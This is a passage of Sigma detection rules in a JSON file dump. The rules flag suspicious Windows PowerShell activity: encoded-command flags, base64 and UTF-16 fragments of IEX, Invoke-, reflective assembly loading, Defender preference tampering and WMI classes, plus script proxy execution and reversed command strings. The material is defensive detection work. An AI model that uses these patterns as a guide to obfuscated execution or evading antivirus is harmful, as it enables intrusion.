    "content": "title: Suspicious PowerShell Encoded Command Patterns\nid: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c\nstatus: test\ndescription: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains\nreferences:\n    - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-05-24\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.Exe'\n              - 'pwsh.dll'\n    selection_flags:\n        CommandLine|contains:\n            - ' -e '\n            - ' -en '\n            - ' -enc '\n            - ' -enco'\n    selection_encoded:\n        CommandLine|contains:\n            - ' JAB'\n            - ' SUVYI'\n            - ' SQBFAFgA'\n            - ' aWV4I'\n            - ' IAB'\n            - ' PAA'\n            - ' aQBlAHgA'\n    filter_gcworker:\n        ParentImage|contains:\n            - 'C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n            - '\\gc_worker.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Other tools that work with encoded scripts in the command line instead of script files\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml",
    "content": "title: Suspicious Obfuscated PowerShell Code\nid: 8d01b53f-456f-48ee-90f6-bc28e67d4e35\nstatus: test\ndescription: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines\nreferences:\n    - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-11\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            #  -bxor 0x\n            - 'IAAtAGIAeABvAHIAIAAwAHgA'\n            - 'AALQBiAHgAbwByACAAMAB4A'\n            - 'gAC0AYgB4AG8AcgAgADAAeA'\n            # .Invoke() |\n            - 'AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg'\n            - 'AuAEkAbgB2AG8AawBlACgAKQAgAHwAI'\n            - 'ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC'\n            # {1}{0}\" -f\n            # {0}{3}\" -f\n            # {2}{0}\" -f\n            - 'AHsAMQB9AHsAMAB9ACIAIAAtAGYAI'\n            - 'B7ADEAfQB7ADAAfQAiACAALQBmAC'\n            - 'AewAxAH0AewAwAH0AIgAgAC0AZgAg'\n            - 'AHsAMAB9AHsAMwB9ACIAIAAtAGYAI'\n            - 'B7ADAAfQB7ADMAfQAiACAALQBmAC'\n            - 'AewAwAH0AewAzAH0AIgAgAC0AZgAg'\n            - 'AHsAMgB9AHsAMAB9ACIAIAAtAGYAI'\n            - 'B7ADIAfQB7ADAAfQAiACAALQBmAC'\n            - 'AewAyAH0AewAwAH0AIgAgAC0AZgAg'\n            # {1}{0}' -f\n            # {0}{3}' -f\n            # {2}{0}' -f\n            - 'AHsAMQB9AHsAMAB9ACcAIAAtAGYAI'\n            - 'B7ADEAfQB7ADAAfQAnACAALQBmAC'\n            - 'AewAxAH0AewAwAH0AJwAgAC0AZgAg'\n            - 'AHsAMAB9AHsAMwB9ACcAIAAtAGYAI'\n            - 'B7ADAAfQB7ADMAfQAnACAALQBmAC'\n            - 'AewAwAH0AewAzAH0AJwAgAC0AZgAg'\n            - 'AHsAMgB9AHsAMAB9ACcAIAAtAGYAI'\n            - 'B7ADIAfQB7ADAAfQAnACAALQBmAC'\n            - 'AewAyAH0AewAwAH0AJwAgAC0AZgAg'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml",
    "content": "title: PowerShell Base64 Encoded FromBase64String Cmdlet\nid: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c\nstatus: test\ndescription: Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-08-24\nmodified: 2023-04-06\ntags:\n    - attack.defense-evasion\n    - attack.t1140\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains: '::FromBase64String'\n        # UTF-16 LE\n        - CommandLine|contains:\n              - 'OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA'\n              - 'oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA'\n              - '6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml",
    "content": "title: Malicious Base64 Encoded PowerShell Keywords in Command Lines\nid: f26c6093-6f14-4b12-800f-0fcb46f5ffd0\nstatus: test\ndescription: Detects base64 encoded strings used in hidden malicious PowerShell command lines\nreferences:\n    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/\nauthor: John Lambert (rule)\ndate: 2019-01-16\nmodified: 2023-01-05\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_hidden:\n        CommandLine|contains: ' hidden '\n    selection_encoded:\n        CommandLine|contains:\n            - 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'\n            - 'aXRzYWRtaW4gL3RyYW5zZmVy'\n            - 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'\n            - 'JpdHNhZG1pbiAvdHJhbnNmZX'\n            - 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'\n            - 'Yml0c2FkbWluIC90cmFuc2Zlc'\n            - 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'\n            - 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'\n            - 'JGNodW5rX3Npem'\n            - 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'\n            - 'RjaHVua19zaXpl'\n            - 'Y2h1bmtfc2l6Z'\n            - 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'\n            - 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'\n            - 'lPLkNvbXByZXNzaW9u'\n            - 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'\n            - 'SU8uQ29tcHJlc3Npb2'\n            - 'Ty5Db21wcmVzc2lvb'\n            - 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'\n            - 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'\n            - 'lPLk1lbW9yeVN0cmVhb'\n            - 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'\n            - 'SU8uTWVtb3J5U3RyZWFt'\n            - 'Ty5NZW1vcnlTdHJlYW'\n            - '4ARwBlAHQAQwBoAHUAbgBrA'\n            - '5HZXRDaHVua'\n            - 'AEcAZQB0AEMAaAB1AG4Aaw'\n            - 'LgBHAGUAdABDAGgAdQBuAGsA'\n            - 'LkdldENodW5r'\n            - 'R2V0Q2h1bm'\n            - 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'\n            - 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'\n            - 'RIUkVBRF9JTkZPNj'\n            - 'SFJFQURfSU5GTzY0'\n            - 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'\n            - 'VEhSRUFEX0lORk82N'\n            - 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'\n            - 'cmVhdGVSZW1vdGVUaHJlYW'\n            - 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'\n            - 'NyZWF0ZVJlbW90ZVRocmVhZ'\n            - 'Q3JlYXRlUmVtb3RlVGhyZWFk'\n            - 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'\n            - '0AZQBtAG0AbwB2AGUA'\n            - '1lbW1vdm'\n            - 'AGUAbQBtAG8AdgBlA'\n            - 'bQBlAG0AbQBvAHYAZQ'\n            - 'bWVtbW92Z'\n            - 'ZW1tb3Zl'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml",
    "content": "title: PowerShell Base64 Encoded IEX Cmdlet\nid: 88f680b8-070e-402c-ae11-d2914f2257f1\nstatus: test\ndescription: Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-08-23\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains:\n              - 'IEX (['\n              - 'iex (['\n              - 'iex (New'\n              - 'IEX (New'\n              - 'IEX(['\n              - 'iex(['\n              - 'iex(New'\n              - 'IEX(New'\n              - \"IEX(('\"\n              - \"iex(('\"\n        # UTF16 LE\n        - CommandLine|contains:\n              - 'SQBFAFgAIAAoAFsA'\n              - 'kARQBYACAAKABbA'\n              - 'JAEUAWAAgACgAWw'\n              - 'aQBlAHgAIAAoAFsA'\n              - 'kAZQB4ACAAKABbA'\n              - 'pAGUAeAAgACgAWw'\n              - 'aQBlAHgAIAAoAE4AZQB3A'\n              - 'kAZQB4ACAAKABOAGUAdw'\n              - 'pAGUAeAAgACgATgBlAHcA'\n              - 'SQBFAFgAIAAoAE4AZQB3A'\n              - 'kARQBYACAAKABOAGUAdw'\n              - 'JAEUAWAAgACgATgBlAHcA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml",
    "content": "title: PowerShell Base64 Encoded Invoke Keyword\nid: 6385697e-9f1b-40bd-8817-f4a91f40508e\nrelated:\n    - id: fd6e2919-3936-40c9-99db-0aa922c356f7\n      type: obsolete\nstatus: test\ndescription: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t\ndate: 2022-05-20\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_enc:\n        CommandLine|contains: ' -e'\n    selection_cli_invoke:\n        CommandLine|contains:\n            # Invoke-\n            # UTF-16LE\n            - 'SQBuAHYAbwBrAGUALQ'\n            - 'kAbgB2AG8AawBlAC0A'\n            - 'JAG4AdgBvAGsAZQAtA'\n            # UTF-8\n            - 'SW52b2tlL'\n            - 'ludm9rZS'\n            - 'JbnZva2Ut'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml",
    "content": "title: Powershell Base64 Encoded MpPreference Cmdlet\nid: c6fb44c6-71f5-49e6-9462-1425d328aee3\nstatus: test\ndescription: Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-04\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains:\n              - 'Add-MpPreference '\n              - 'Set-MpPreference '\n              - 'add-mppreference '\n              - 'set-mppreference '\n        - CommandLine|contains:\n              # UTF16-LE\n              - 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml",
    "content": "title: PowerShell Base64 Encoded Reflective Assembly Load\nid: 62b7ccc9-23b4-471e-aa15-6da3663c4d59\nrelated:\n    - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1\n      type: similar\nstatus: test\ndescription: Detects base64 encoded .NET reflective loading of Assembly\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)\ndate: 2022-03-01\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1620\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # [Reflection.Assembly]::Load(\n            - 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'\n            - 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'\n            - 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'\n            # [reflection.assembly]::(\"Load\")\n            - 'AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC'\n            - 'BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp'\n            - 'AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK'\n            # [Reflection.Assembly]::(\"Load\")\n            - 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ'\n            - 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA'\n            - 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA'\n            # [reflection.assembly]::Load(\n            - 'WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'\n            - 'sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'\n            - 'bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml",
    "content": "title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call\nid: 9c0295ce-d60d-40bd-bd74-84673b7592b1\nrelated:\n    - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59\n      type: similar\nstatus: test\ndescription: Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-01\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # ::(\"L\"+\"oad\")\n            - 'OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ'\n            - 'oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA'\n            - '6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA'\n            # ::(\"Lo\"+\"ad\")\n            - 'OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ'\n            - 'oAOgAoACIATABvACIAKwAiAGEAZAAiACkA'\n            - '6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA'\n            # ::(\"Loa\"+\"d\")\n            - 'OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ'\n            - 'oAOgAoACIATABvAGEAIgArACIAZAAiACkA'\n            - '6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA'\n            # ::('L'+'oad')\n            - 'OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ'\n            - 'oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA'\n            - '6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA'\n            # ::('Lo'+'ad')\n            - 'OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ'\n            - 'oAOgAoACcATABvACcAKwAnAGEAZAAnACkA'\n            - '6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA'\n            # ::('Loa'+'d')\n            - 'OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ'\n            - 'oAOgAoACcATABvAGEAJwArACcAZAAnACkA'\n            - '6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml",
    "content": "title: PowerShell Base64 Encoded WMI Classes\nid: 1816994b-42e1-4fb1-afd2-134d88184f71\nrelated:\n    - id: 47688f1b-9f51-4656-b013-3cc49a166a36\n      type: obsolete\nstatus: test\ndescription: Detects calls to base64 encoded WMI class such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\nauthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_shadowcopy:\n        # Win32_ShadowCopy\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ'\n            - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA'\n            - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A'\n            - 'V2luMzJfU2hhZG93Y29we'\n            - 'dpbjMyX1NoYWRvd2NvcH'\n            - 'XaW4zMl9TaGFkb3djb3B5'\n    selection_cli_scheduledJob:\n        # Win32_ScheduledJob\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA'\n            - 'cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA'\n            - 'XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg'\n            - 'V2luMzJfU2NoZWR1bGVkSm9i'\n            - 'dpbjMyX1NjaGVkdWxlZEpvY'\n            - 'XaW4zMl9TY2hlZHVsZWRKb2'\n    selection_cli_process:\n        # Win32_Process\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw'\n            - 'cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA'\n            - 'XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA'\n            - 'V2luMzJfUHJvY2Vzc'\n            - 'dpbjMyX1Byb2Nlc3'\n            - 'XaW4zMl9Qcm9jZXNz'\n    selection_cli_useraccount:\n        # Win32_UserAccount\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A'\n            - 'cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA'\n            - 'XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA'\n            - 'V2luMzJfVXNlckFjY291bn'\n            - 'dpbjMyX1VzZXJBY2NvdW50'\n            - 'XaW4zMl9Vc2VyQWNjb3Vud'\n    selection_cli_loggedonuser:\n        # Win32_LoggedOnUser\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA'\n            - 'cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA'\n            - 'XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg'\n            - 'V2luMzJfTG9nZ2VkT25Vc2Vy'\n            - 'dpbjMyX0xvZ2dlZE9uVXNlc'\n            - 'XaW4zMl9Mb2dnZWRPblVzZX'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml",
    "content": "title: Potential Process Execution Proxy Via CL_Invocation.ps1\nid: a0459f02-ac51-4c09-b511-b8c9203fc429\nstatus: test\ndescription: Detects calls to \"SyncInvoke\" that is part of the \"CL_Invocation.ps1\" script to proxy execution using \"System.Diagnostics.Process\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova\ndate: 2020-10-14\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via \"-Command\" or \"-ScriptBlock\" flags for example.\n        CommandLine|contains: 'SyncInvoke '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml",
    "content": "title: Assembly Loading Via CL_LoadAssembly.ps1\nid: c57872c7-614f-4d7f-a40d-b78c8df2d30d\nstatus: test\ndescription: Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. This can be abused to load different assemblies and bypass App locker controls.\nreferences:\n    - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via \"-Command\" or \"-ScriptBlock\" flags for example.\n        CommandLine|contains:\n            - 'LoadAssemblyFromPath '\n            - 'LoadAssemblyFromNS '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml",
    "content": "title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1\nid: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d\nstatus: test\ndescription: Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\nauthor: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113\ndate: 2022-05-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pwsh:\n        ParentImage|endswith:\n            # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains: ' -nologo -windowstyle minimized -file '\n    selection_temp:\n        # Note: Since the function uses \"env:temp\" the value will change depending on the context of exec\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml",
    "content": "title: ConvertTo-SecureString Cmdlet Usage Via CommandLine\nid: 74403157-20f5-415d-89a7-c505779585cf\nstatus: test\ndescription: Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains: 'ConvertTo-SecureString'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use to pass password to different powershell commands\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml",
    "content": "title: Potential PowerShell Obfuscation Via Reversed Commands\nid: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4\nstatus: test\ndescription: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers\nreferences:\n    - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-05-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            - 'hctac'\n            - 'kaerb'\n            - 'dnammoc'\n            - 'ekovn' # Also covers 'ekovni'\n            - 'eliFd'\n            - 'rahc'\n            - 'etirw'\n            - 'golon'\n            - 'tninon'\n            - 'eddih'\n            - 'tpircS'\n            - 'ssecorp'\n            - 'llehsrewop'\n            - 'esnopser'\n            - 'daolnwod'\n            - 'tneilCbeW'\n            - 'tneilc'\n            - 